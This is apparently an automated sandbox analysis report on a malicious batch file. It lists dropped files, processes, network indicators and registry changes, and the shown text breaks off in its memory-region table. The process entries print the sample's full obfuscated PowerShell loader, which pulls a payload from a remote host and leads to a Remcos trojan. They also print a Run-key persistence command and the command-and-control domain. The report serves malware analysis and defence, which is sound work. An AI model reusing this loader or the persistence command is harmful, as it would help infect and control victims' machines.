Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
ZW_PCCE-010023024001.bat
|
ASCII text, with very long lines (5980), with no line terminators
|
initial sample
|
||
C:\ProgramData\remcos\logs.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\udmiwkqorwjzipcigan.vbs
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\json[1].json
|
JSON data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kl32ek5g.jjk.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mje33vhh.a24.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vaucwujz.b0r.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x45nip12.f4u.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\bhv6BC6.tmp
|
Extensible storage engine DataBase, version 0x620, checksum 0x5c23815b, page size 32768, DirtyShutdown, Windows version 10.0
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\kywjvrv
|
Unicode text, UTF-16, little-endian text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDesusertions\2BWCY09RDCGF38WA994P.temp
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDesusertions\590aee7bdd69b59b.customDesusertions-ms (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Trykimprgneredes.Ene
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
There are 5 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\ZW_PCCE-010023024001.bat" "
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe -windowstyle hidden " <#Chrimsel aflsser purificant #>;$Hydrosphere='Northumbria';<#Opkaldelses Torsionernes
Certifiability Iconomachal Neutronerne Abv Afgiftningers #>;$Fileresdeologikritikkernes=$Lovregel+$host.UI; function viruserne($Tentaculite){If
($Fileresdeologikritikkernes) {$Gasapparats++;}$Fileresmitators=$Troldunges+$Tentaculite.'Length'-$Gasapparats; for( $Fileres=4;$Fileres
-lt $Fileresmitators;$Fileres+=5){$Sempres=$Fileres;$Haccucal+=$Tentaculite[$Fileres];$Threadmaking='Bagstoppere';}$Haccucal;}function
Vvningens($Smadrekassens){ & ($Hypogeic122) ($Smadrekassens);}$Taagngeres=viruserne 'R suMChlooMaalz Ko iCoerlSylflHyb.aDyrt/Delg
';$Taagngeres+=viruserne 'Comp5helb.Bai 0moth Rege(MaiiWBe aiTaranTam,d SuroTaanwFisksD.bk esiNSandTEunu Cayu1T nt0Rets.Sp
j0Ster; Kha RetWBergi npan Sta6Peac4Parb; Woo VegxReto6Syne4 F,i; Nov MassrBondvStud:Yug,1Mu.v3Inge1A ur. pap0 Pil)Gimb
Usk GCirce MilcEskok Svao C a/Kons2 Ell0Mure1Domi0 Kar0Edde1Tamm0 ato1Smut Re,mFG aciSte.rForveSalofTankoSmrexHuck/Miso1Dena3Gird1Bi
d. Mid0Data ';$Uncorner=viruserne ',edgUVilds xtrE defROmdm-FolkaDrawGM thePrepnErnrT Mi. ';$Neuk=viruserne 'DelrhRacetHk
rtRo kpTatasf.du:Over/Thra/StoreEqu tHavfhteisyK imsLasi. ,atrFistoViri/SmaaNthymo elinathyaUn fdReasdAtomiJibicPikatBureiStepnRg
agO ga. DumqCounx EnedScri ';$Dacryd=viruserne 'Felt>Hjer ';$Hypogeic122=viruserne 'TrafIVinoe trixGono ';$Gar='Nondenunciatory';$Fejlfunktioner='\Trykimprgneredes.Ene';Vvningens
(viruserne 'Sp.y$Ho.lG stoLAfv OkarlB EkaaNondLLent: Ud.Spe iU SamP,skve TerrDaemdBankUSuperGestA tirlValg=Lank$ IndE KatnBrobvLact:
SenaInfoPTerrpJongD S saF rmt RetA.obb+ Lat$Ps,uFDesqEHowlJRis LArchFUnfeu jlkNulykkConsT E,iisi.toKerbNMusee Ha RWave ');Vvningens
(viruserne 'Alte$W dlg KonlTra OTyvsB T aA laLExec:UddaMUna oBestST ilAUnasI MorKM.urkI,ideUnexr BarNB.rgePapi= .an$DopinSvr.eTrykuRebrKKatr.
agiSFagsp Bdel dagi vi t.uss(Uds $F nzDS apasvanCUndeRK drY PredLege)Shin ');Vvningens (viruserne 'D.fi[,rayn adkEdragT Ido.Tri
S DupETredRA skvSul,iSknlcIndiE UndP Re O rndiGuatnnondT S emFarvaStranP egAAuxoGUdlyEUdg,rClo ]Para:Bu,a:InlasUncaeConnCF,rkURallrO
grIWithtCharySeraPRadirNarkODiplTO,thOKontcLangoPygalland T,rp=skin .ver[banknKoe,ePoi T,ent.UnsuSErytE tancAgarUForpr Va,IP
ivT BroyFrgepBrndR IncotravtSurmOBwancJasiOUnquL DestVapoYphytP lateSk f]Hand:Velv: S,dt ,teL VidSStam1Duct2Skr ');$Neuk=$mosaikkerne[0];$Srlovgivningerne=(viruserne
'Pek.$U paGStenLA trOCir.BSkafa TheLSk,l: To f llOTopar UnoWUnscaSinoRProtdSperEGut RE ols Unh=gavnnF leEOxydwMugg-backOUbetBAm,njHorse
,udC FortW,gl RefusThriyEnkeSRemutPeroeEpalMT,al. eprNThicePlaytAr e. ypnWAcylESl,gbSp rCVe,sLMoorIFinpeGendn I etAnem ');Vvningens
($Srlovgivningerne);Vvningens (viruserne 'st n$UfrefGeheoCentr i gw,rbiaManurgen dGlaneMellrBosss.oru.Tl eHAlkoeTilsaPostdKal
eL,str Forss.ri[wago$Mul.UChain CodcSyklo Satr curnN.nleLdrer .na]Or h=Meta$D,kaTAcc a Abea C sg aanKendg HeteM sqrsmaleSeedsFosi
');$Grasshopper=viruserne 'Stee$,ommfTrotoNon rg nbwKvalaScotrRdhudUsheeSlamr.outs Une.D sbDS,oroGenfwC nfnAntil,fteoCoc.a
SttdCow FBesti Baal rugeK.ok(Drug$AntoNPangeBehauIndukVigt, yk$BedvUUdr nP aspPredrPassoEutanTopfoR.abuEnvynEtagcMe oiLog.nUmodgL,ma)Bard
';$Unpronouncing=$Superdural;Vvningens (viruserne 'Maju$ UhaGMultLJugaoP.enb BhmARedeLschl:monafForbOStorLAndeEPr lnS,mmdTadpETri
sFa.b=Util( MinTpur.eMarkspresTPinl-Kr nPHaveaKurvtGlasHCebu Mult$SonnUNonvNSam,PP rsrKu doAarsN ,doO UnfUPapanRaggcImplIComiNErklgMand)Undi
');while (!$Folendes) {Vvningens (viruserne 'S.ne$JerngFilmlOpgaoEjsab joka Lnnl Unh: SpuPMa,erKliteLadipRansa StyrCamoeIn
tdGent=Porp$Trafttr.kr ForuSubsetetr ') ;Vvningens $Grasshopper;Vvningens (viruserne ' amfsSquiTO.eraCincRIffitBo g- EliS
EgnlInv,EspalEabscpLers Ep.s4Arg. ');Vvningens (viruserne 'bygg$ S vgContLE suOVedfBSc lA icol Leg:JoblFSolboLoyaLForbE L
knTrandGyroEUnsesSmed=Ni.r( ,rgtG steChrosInteTHerb- AbsP Tobakartt egeh nmo Arc$Shawu,ejlnArbepInv RAcetoTrevnU saO ur,UfolkNFormCSunli.pronHypeGHype)
Haa ') ;Vvningens (viruserne 'Over$pipegSemilGrimOP,eubGingABoutLFors:AyahCC.plOM.ssmUntreUnsclVe dITeloEInjusa meT Pyg=Barf$SkycGLovblorpiogigaB
Dama MunLPenn:frembE ideGe tmVninE OpseBrygT Uns+ Skr+Und %Unsu$cultMf jloUnb.STorpa imeiSpanKActuK SecE .lirAnemNSkruEEmer.Te
rCDyreO indu AksNMicrT en ') ;$Neuk=$mosaikkerne[$Comeliest];}$Forvrrelser=319177;$synclastic=31223;Vvningens (viruserne
'Sk l$ ootgExcyl omsoS ilbSupeaPertL.ern:LimpKPr.doTrouMNrinMPolyEScopNHeretChapeSe,vRDri EKe,uNW.ipdDub E F rSSvmm Dksl=
Kla epidgUncaEEx,itKrse- Kupc ArcOD sinUs,utMurbEOmhunK ontSko. Forh$S igUBillNTes,PHomerBekoo Swan SulOIwarU,entNCounCC vii
Komnh stg Bkk ');Vvningens (viruserne ' en$ MalgTreflSkaloSh rbVanda ovel jou:Mrk fStila SvilEncld.elseColor elaeFan b ibsGru
t Perr nona rnrplebbpForgeMavesRawl Pro,= ubr Sho[ConvS,arbyInexsCompt InieN.rvm ir.GoneC L.mo ArbnfarmvShodeAnabrAsket
Fac]Ra k: iff:TetrFDaasrWateoMes.mPlotBDefia MagsOvereCele6Gree4St,rSGun tT.rnrForfiNot nMantgPal (Brev$TachK G.eoPi pmInh
m rabeOptin sv t.eboe RygrGallemarinLinjdVrikeHalvsrdde) nds ');Vvningens (viruserne 'Unde$ ownG urhL ForoAl,sbAutoaLyspLlakf:
SetpSagsaSt uTAstme repNTovnTBorieC.ilR StuI.eerNCo ogSkr,el teR friNS alEshudSdeto Dato=Stic Rape[ omfsUnmaYKlimSDiopT.ffieFla.MDem
.shoptLommeDobbxSyndtSizz. utaeSmrenIndiC FarObostDPibeI Prenchapgdyre]k mm: nin: aliaCladS TimCLeptICaprIF rb.RiddGFlorE,lketFredSIntetMat.RTemiIC,rynKlamGinve(Non,$
UnrfCoonAPostLSepaDUnpreSygdRMumme CarbEnqus svat Smar JenAKal PCyclpklunE rots Oks)Broa ');Vvningens (viruserne ' S l$Be.oGW.teLfsteoK,tyBFrieaMu,eLGr
m: KrueS btU Bkbr FreyBeerA BrdlTa tePaaka,eboN N,u=s.aa$Corop BalaNidstSavle ,ejnMiniTCr nESalvROsmoipelonLoregMotoeTopur
H,snPosteVa uS U o.Pasts,eopuCa ib AldSforhT O eRGranI jednSub,gBekn( und$LaboFOncioHonortrilVrespRj aprSundeFil.LCymbs UndENit
Rlag ,Ditl$Afd sVedky BluNVe nCCon l innA CedSDe aTS,uliTilscP.zz) Is ');Vvningens $Euryalean;"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Chrimsel aflsser purificant #>;$Hydrosphere='Northumbria';<#Opkaldelses
Torsionernes Certifiability Iconomachal Neutronerne Abv Afgiftningers #>;$Fileresdeologikritikkernes=$Lovregel+$host.UI; function
viruserne($Tentaculite){If ($Fileresdeologikritikkernes) {$Gasapparats++;}$Fileresmitators=$Troldunges+$Tentaculite.'Length'-$Gasapparats;
for( $Fileres=4;$Fileres -lt $Fileresmitators;$Fileres+=5){$Sempres=$Fileres;$Haccucal+=$Tentaculite[$Fileres];$Threadmaking='Bagstoppere';}$Haccucal;}function
Vvningens($Smadrekassens){ & ($Hypogeic122) ($Smadrekassens);}$Taagngeres=viruserne 'R suMChlooMaalz Ko iCoerlSylflHyb.aDyrt/Delg
';$Taagngeres+=viruserne 'Comp5helb.Bai 0moth Rege(MaiiWBe aiTaranTam,d SuroTaanwFisksD.bk esiNSandTEunu Cayu1T nt0Rets.Sp
j0Ster; Kha RetWBergi npan Sta6Peac4Parb; Woo VegxReto6Syne4 F,i; Nov MassrBondvStud:Yug,1Mu.v3Inge1A ur. pap0 Pil)Gimb
Usk GCirce MilcEskok Svao C a/Kons2 Ell0Mure1Domi0 Kar0Edde1Tamm0 ato1Smut Re,mFG aciSte.rForveSalofTankoSmrexHuck/Miso1Dena3Gird1Bi
d. Mid0Data ';$Uncorner=viruserne ',edgUVilds xtrE defROmdm-FolkaDrawGM thePrepnErnrT Mi. ';$Neuk=viruserne 'DelrhRacetHk
rtRo kpTatasf.du:Over/Thra/StoreEqu tHavfhteisyK imsLasi. ,atrFistoViri/SmaaNthymo elinathyaUn fdReasdAtomiJibicPikatBureiStepnRg
agO ga. DumqCounx EnedScri ';$Dacryd=viruserne 'Felt>Hjer ';$Hypogeic122=viruserne 'TrafIVinoe trixGono ';$Gar='Nondenunciatory';$Fejlfunktioner='\Trykimprgneredes.Ene';Vvningens
(viruserne 'Sp.y$Ho.lG stoLAfv OkarlB EkaaNondLLent: Ud.Spe iU SamP,skve TerrDaemdBankUSuperGestA tirlValg=Lank$ IndE KatnBrobvLact:
SenaInfoPTerrpJongD S saF rmt RetA.obb+ Lat$Ps,uFDesqEHowlJRis LArchFUnfeu jlkNulykkConsT E,iisi.toKerbNMusee Ha RWave ');Vvningens
(viruserne 'Alte$W dlg KonlTra OTyvsB T aA laLExec:UddaMUna oBestST ilAUnasI MorKM.urkI,ideUnexr BarNB.rgePapi= .an$DopinSvr.eTrykuRebrKKatr.
agiSFagsp Bdel dagi vi t.uss(Uds $F nzDS apasvanCUndeRK drY PredLege)Shin ');Vvningens (viruserne 'D.fi[,rayn adkEdragT Ido.Tri
S DupETredRA skvSul,iSknlcIndiE UndP Re O rndiGuatnnondT S emFarvaStranP egAAuxoGUdlyEUdg,rClo ]Para:Bu,a:InlasUncaeConnCF,rkURallrO
grIWithtCharySeraPRadirNarkODiplTO,thOKontcLangoPygalland T,rp=skin .ver[banknKoe,ePoi T,ent.UnsuSErytE tancAgarUForpr Va,IP
ivT BroyFrgepBrndR IncotravtSurmOBwancJasiOUnquL DestVapoYphytP lateSk f]Hand:Velv: S,dt ,teL VidSStam1Duct2Skr ');$Neuk=$mosaikkerne[0];$Srlovgivningerne=(viruserne
'Pek.$U paGStenLA trOCir.BSkafa TheLSk,l: To f llOTopar UnoWUnscaSinoRProtdSperEGut RE ols Unh=gavnnF leEOxydwMugg-backOUbetBAm,njHorse
,udC FortW,gl RefusThriyEnkeSRemutPeroeEpalMT,al. eprNThicePlaytAr e. ypnWAcylESl,gbSp rCVe,sLMoorIFinpeGendn I etAnem ');Vvningens
($Srlovgivningerne);Vvningens (viruserne 'st n$UfrefGeheoCentr i gw,rbiaManurgen dGlaneMellrBosss.oru.Tl eHAlkoeTilsaPostdKal
eL,str Forss.ri[wago$Mul.UChain CodcSyklo Satr curnN.nleLdrer .na]Or h=Meta$D,kaTAcc a Abea C sg aanKendg HeteM sqrsmaleSeedsFosi
');$Grasshopper=viruserne 'Stee$,ommfTrotoNon rg nbwKvalaScotrRdhudUsheeSlamr.outs Une.D sbDS,oroGenfwC nfnAntil,fteoCoc.a
SttdCow FBesti Baal rugeK.ok(Drug$AntoNPangeBehauIndukVigt, yk$BedvUUdr nP aspPredrPassoEutanTopfoR.abuEnvynEtagcMe oiLog.nUmodgL,ma)Bard
';$Unpronouncing=$Superdural;Vvningens (viruserne 'Maju$ UhaGMultLJugaoP.enb BhmARedeLschl:monafForbOStorLAndeEPr lnS,mmdTadpETri
sFa.b=Util( MinTpur.eMarkspresTPinl-Kr nPHaveaKurvtGlasHCebu Mult$SonnUNonvNSam,PP rsrKu doAarsN ,doO UnfUPapanRaggcImplIComiNErklgMand)Undi
');while (!$Folendes) {Vvningens (viruserne 'S.ne$JerngFilmlOpgaoEjsab joka Lnnl Unh: SpuPMa,erKliteLadipRansa StyrCamoeIn
tdGent=Porp$Trafttr.kr ForuSubsetetr ') ;Vvningens $Grasshopper;Vvningens (viruserne ' amfsSquiTO.eraCincRIffitBo g- EliS
EgnlInv,EspalEabscpLers Ep.s4Arg. ');Vvningens (viruserne 'bygg$ S vgContLE suOVedfBSc lA icol Leg:JoblFSolboLoyaLForbE L
knTrandGyroEUnsesSmed=Ni.r( ,rgtG steChrosInteTHerb- AbsP Tobakartt egeh nmo Arc$Shawu,ejlnArbepInv RAcetoTrevnU saO ur,UfolkNFormCSunli.pronHypeGHype)
Haa ') ;Vvningens (viruserne 'Over$pipegSemilGrimOP,eubGingABoutLFors:AyahCC.plOM.ssmUntreUnsclVe dITeloEInjusa meT Pyg=Barf$SkycGLovblorpiogigaB
Dama MunLPenn:frembE ideGe tmVninE OpseBrygT Uns+ Skr+Und %Unsu$cultMf jloUnb.STorpa imeiSpanKActuK SecE .lirAnemNSkruEEmer.Te
rCDyreO indu AksNMicrT en ') ;$Neuk=$mosaikkerne[$Comeliest];}$Forvrrelser=319177;$synclastic=31223;Vvningens (viruserne
'Sk l$ ootgExcyl omsoS ilbSupeaPertL.ern:LimpKPr.doTrouMNrinMPolyEScopNHeretChapeSe,vRDri EKe,uNW.ipdDub E F rSSvmm Dksl=
Kla epidgUncaEEx,itKrse- Kupc ArcOD sinUs,utMurbEOmhunK ontSko. Forh$S igUBillNTes,PHomerBekoo Swan SulOIwarU,entNCounCC vii
Komnh stg Bkk ');Vvningens (viruserne ' en$ MalgTreflSkaloSh rbVanda ovel jou:Mrk fStila SvilEncld.elseColor elaeFan b ibsGru
t Perr nona rnrplebbpForgeMavesRawl Pro,= ubr Sho[ConvS,arbyInexsCompt InieN.rvm ir.GoneC L.mo ArbnfarmvShodeAnabrAsket
Fac]Ra k: iff:TetrFDaasrWateoMes.mPlotBDefia MagsOvereCele6Gree4St,rSGun tT.rnrForfiNot nMantgPal (Brev$TachK G.eoPi pmInh
m rabeOptin sv t.eboe RygrGallemarinLinjdVrikeHalvsrdde) nds ');Vvningens (viruserne 'Unde$ ownG urhL ForoAl,sbAutoaLyspLlakf:
SetpSagsaSt uTAstme repNTovnTBorieC.ilR StuI.eerNCo ogSkr,el teR friNS alEshudSdeto Dato=Stic Rape[ omfsUnmaYKlimSDiopT.ffieFla.MDem
.shoptLommeDobbxSyndtSizz. utaeSmrenIndiC FarObostDPibeI Prenchapgdyre]k mm: nin: aliaCladS TimCLeptICaprIF rb.RiddGFlorE,lketFredSIntetMat.RTemiIC,rynKlamGinve(Non,$
UnrfCoonAPostLSepaDUnpreSygdRMumme CarbEnqus svat Smar JenAKal PCyclpklunE rots Oks)Broa ');Vvningens (viruserne ' S l$Be.oGW.teLfsteoK,tyBFrieaMu,eLGr
m: KrueS btU Bkbr FreyBeerA BrdlTa tePaaka,eboN N,u=s.aa$Corop BalaNidstSavle ,ejnMiniTCr nESalvROsmoipelonLoregMotoeTopur
H,snPosteVa uS U o.Pasts,eopuCa ib AldSforhT O eRGranI jednSub,gBekn( und$LaboFOncioHonortrilVrespRj aprSundeFil.LCymbs UndENit
Rlag ,Ditl$Afd sVedky BluNVe nCCon l innA CedSDe aTS,uliTilscP.zz) Is ');Vvningens $Euryalean;"
|
||
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\SysWOW64\msiexec.exe"
|
||
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\kywjvrv"
|
||
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\uabbwbgmjcn"
|
||
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\fuomwurowkfkpf"
|
||
C:\Windows\SysWOW64\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\udmiwkqorwjzipcigan.vbs"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ
/d "%Mirko% -windowstyle 1 $Pulsmjr=(gp -Path 'HKCU:\Software\Millihenries\').Scuttock;%Mirko% ($Pulsmjr)"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\SysWOW64\reg.exe
|
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Mirko% -windowstyle
1 $Pulsmjr=(gp -Path 'HKCU:\Software\Millihenries\').Scuttock;%Mirko% ($Pulsmjr)"
|
There are 4 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
rj0987654321.duckdns.org
|
|||
https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DesusertionEndpoint=P
|
unknown
|
||
http://www.imvu.comr
|
unknown
|
||
http://crl.microsoft
|
unknown
|
||
https://aefd.nelreports.net/api/report?cat=bingth
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
http://geoplugin.net/json.gp1
|
unknown
|
||
http://geoplugin.net/json.gp_G
|
unknown
|
||
http://www.imvu.coma
|
unknown
|
||
https://aefd.nelreports.net/api/report?cat=bingaotak
|
unknown
|
||
https://deff.nelreports.net/api/report?cat=msn
|
unknown
|
||
https://edd27623571fc427dc1f8d6ba04dd39f.clo.footprintdns.com/apc/trans.gif?b37f6b94dfddf29d58d90046
|
unknown
|
||
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
|
unknown
|
||
https://rum18.perf.linkedin.com/apc/trans.gif?d99a5c14daed171e4daf3a2c1226bd16
|
unknown
|
||
https://www.google.com
|
unknown
|
||
https://aka.ms/pscore6lB
|
unknown
|
||
https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
https://ethys.ro/
|
unknown
|
||
https://login.yahoo.com/config/login
|
unknown
|
||
http://www.nirsoft.net/
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
http://ethys.ro
|
unknown
|
||
https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DesusertionEndpoint=Edge-Prod-LAX31r5c&
|
unknown
|
||
https://ethys.ro/Nonaddicting.qxd
|
81.180.144.124
|
||
https://www.office.com/
|
unknown
|
||
http://nuget.org/NuGet.exe
|
unknown
|
||
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
https://go.micro
|
unknown
|
||
https://ethys.ro
|
unknown
|
||
http://geoplugin.net/json.gphy
|
unknown
|
||
http://www.imvu.com
|
unknown
|
||
https://aefd.nelreports.net/api/report?cat=wsb
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
http://geoplugin.net/json.gpt
|
unknown
|
||
https://ethys.ro/Nonaddicting.qxdP
|
unknown
|
||
https://github.com/Pester/Pester
|
unknown
|
||
https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DesusertionEndpoint=Edge-Prod-LAX31r5b&
|
unknown
|
||
http://geoplugin.net/json.gp
|
178.237.33.50
|
||
https://ethys.ro/3/tVWTkim99.binT
|
unknown
|
||
https://rum18.perf.linkedin.com/apc/trans.gif?481b7caa9fdb7105b2103a8300811877
|
unknown
|
||
https://ethys.ro/3/tVWTkim99.bin
|
81.180.144.124
|
||
http://www.nirsoft.netUJL
|
unknown
|
||
http://geoplugin.net/
|
unknown
|
||
https://aefd.nelreports.net/api/report?cat=bingaot
|
unknown
|
||
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg
|
unknown
|
||
https://aefd.nelreports.net/api/report?cat=bingrms
|
unknown
|
||
https://www.google.com/accounts/servicelogin
|
unknown
|
||
https://aka.ms/pscore68
|
unknown
|
||
http://geoplugin.net/r
|
unknown
|
||
https://ethys.ro/Nonaddicting.qxdXRyl
|
unknown
|
||
http://www.ebuddy.com
|
unknown
|
There are 44 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
rj0987654321.duckdns.org
|
193.187.91.212
|
||
ethys.ro
|
81.180.144.124
|
||
geoplugin.net
|
178.237.33.50
|
||
s-part-0017.t-0009.fb-t-msedge.net
|
13.107.253.45
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
193.187.91.212
|
rj0987654321.duckdns.org
|
Sweden
|
||
81.180.144.124
|
ethys.ro
|
Romania
|
||
178.237.33.50
|
geoplugin.net
|
Netherlands
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
HKEY_CURRENT_USER\SOFTWARE\Millihenries
|
Scuttock
|
||
HKEY_CURRENT_USER\Environment
|
Mirko
|
||
HKEY_CURRENT_USER\SOFTWARE\Rmc-I42HQ2
|
exepath
|
||
HKEY_CURRENT_USER\SOFTWARE\Rmc-I42HQ2
|
licence
|
||
HKEY_CURRENT_USER\SOFTWARE\Rmc-I42HQ2
|
time
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
LangID
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\System32\WScript.exe.FriendlyAppName
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\System32\WScript.exe.ApplicationCompany
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
Startup key
|
There are 13 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
A606000
|
direct allocation
|
page execute and read and write
|
||
8A49000
|
heap
|
page read and write
|
||
8A23000
|
heap
|
page read and write
|
||
8A47000
|
heap
|
page read and write
|
||
5BCA000
|
trusted library allocation
|
page read and write
|
||
8A47000
|
heap
|
page read and write
|
||
13F90071000
|
trusted library allocation
|
page read and write
|
||
8A47000
|
heap
|
page read and write
|
||
8A47000
|
heap
|
page read and write
|
||
8A44000
|
heap
|
page read and write
|
||
8A23000
|
heap
|
page read and write
|
||
8980000
|
direct allocation
|
page execute and read and write
|
||
8A23000
|
heap
|
page read and write
|
||
8A47000
|
heap
|
page read and write
|
||
8A47000
|
heap
|
page read and write
|
||
8A49000
|
heap
|
page read and write
|
||
8A23000
|
heap
|
page read and write
|
||
8A23000
|
heap
|
page read and write
|
||
8A47000
|
heap
|
page read and write
|
||
8A23000
|
heap
|
page read and write
|
||
48C0000
|
trusted library allocation
|
page read and write
|
||
2698000
|
heap
|
page read and write
|
||
71DC000
|
stack
|
page read and write
|
||
4A9E000
|
heap
|
page read and write
|
||
4A9C000
|
heap
|
page read and write
|
||
13FE9770000
|
trusted library allocation
|
page read and write
|
||
721D000
|
stack
|
page read and write
|
||
C98000
|
stack
|
page read and write
|
||
9CE000
|
stack
|
page read and write
|
||
9DA000
|
heap
|
page read and write
|
||
43B8000
|
heap
|
page read and write
|
||
26A6000
|
heap
|
page read and write
|
||
43B8000
|
heap
|
page read and write
|
||
8990000
|
trusted library allocation
|
page read and write
|
||
3010000
|
trusted library allocation
|
page read and write
|
||
54F000
|
stack
|
page read and write
|
||
8A99000
|
heap
|
page read and write
|
||
43B8000
|
heap
|
page read and write
|
||
43B8000
|
heap
|
page read and write
|
||
7090000
|
direct allocation
|
page read and write
|
||
B4470D000
|
stack
|
page read and write
|
||
934000
|
heap
|
page read and write
|
||
8AAB000
|
heap
|
page read and write
|
||
43AF000
|
heap
|
page read and write
|
||
4991000
|
heap
|
page read and write
|
||
543E000
|
trusted library allocation
|
page read and write
|
||
9BE000
|
stack
|
page read and write
|
||
4FF7000
|
heap
|
page read and write
|
||
43B6000
|
heap
|
page read and write
|
||
4AF6000
|
heap
|
page read and write
|
||
13F81DA5000
|
trusted library allocation
|
page read and write
|
||
2FE0000
|
trusted library allocation
|
page read and write
|
||
13FE7EC0000
|
